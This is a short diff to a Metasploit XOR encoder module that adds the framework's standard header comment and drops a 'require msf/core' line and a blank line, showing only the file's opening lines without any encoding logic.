@@ -1,9 +1,12 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
 require 'metasm'
-require 'msf/core'
 require 'rex/nop/opty2'
 
 class MetasploitModule < Msf::Encoder::Xor
-
   Rank = ManualRanking
 
   def initialize
